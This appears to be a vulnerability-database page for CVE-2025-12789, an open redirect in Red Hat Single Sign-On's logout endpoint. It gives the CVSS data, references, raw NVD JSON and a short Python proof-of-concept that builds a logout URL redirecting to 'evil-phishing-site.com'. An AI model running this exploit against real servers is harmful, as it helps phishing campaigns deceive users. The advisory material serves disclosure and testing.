CVE-2025-12789

Description

A flaw was found in Red Hat Single Sign-On. This issue is an Open Redirect vulnerability that occurs during the logout process. The redirect_uri parameter associated with the openid-connect logout protocol does not properly validate the provided URL.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Red Hat Single Sign-On < 受影响版本（需参考官方修复公告）

Red Hat Keycloak（上游项目）< 修复版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-12789 PoC - Open Redirect in Red Hat Single Sign-On
# Target: Red Hat Single Sign-On OpenID Connect Logout Endpoint
# Attack Type: Open Redirect

import requests
from urllib.parse import quote

def exploit_open_redirect(target_url, redirect_target):
    """
    Exploit the open redirect vulnerability in RHSSO logout endpoint
    
    Args:
        target_url: Base URL of the vulnerable RHSSO instance
        redirect_target: Malicious URL to redirect victims to
    """
    # Encode the target URL for the redirect_uri parameter
    encoded_redirect = quote(redirect_target, safe='')
    
    # Construct the malicious logout URL
    logout_endpoint = f"{target_url}/auth/realms/master/protocol/openid-connect/logout"
    malicious_url = f"{logout_endpoint}?redirect_uri={encoded_redirect}"
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Malicious URL: {malicious_url}")
    print(f"[*] Redirect Target: {redirect_target}")
    
    # Send request to trigger the redirect
    try:
        response = requests.get(malicious_url, allow_redirects=False)
        if response.status_code in [301, 302, 303, 307, 308]:
            location = response.headers.get('Location', '')
            print(f"[+] Vulnerable! Server responds with redirect to: {location}")
            return True
        else:
            print(f"[-] Response status: {response.status_code}")
            return False
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return False

# Example usage
if __name__ == "__main__":
    target = "https://vulnerable-rhsso.example.com"
    attacker_domain = "https://evil-phishing-site.com"
    
    exploit_open_redirect(target, attacker_domain)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12789
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12789
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12789/
[4] VulDB https://vuldb.com/cve/CVE-2025-12789
[5] https://access.redhat.com/security/cve/CVE-2025-12789
[6] https://bugzilla.redhat.com/show_bug.cgi?id=2413001

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12789", "sourceIdentifier": "[email protected]", "published": "2025-11-07T00:15:53.117", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Red Hat Single Sign-On. This issue is an Open Redirect vulnerability that occurs during the logout process. The redirect_uri parameter associated with the openid-connect logout protocol does not properly validate the provided URL."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2025-12789", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2413001", "source": "[email protected]"}]}}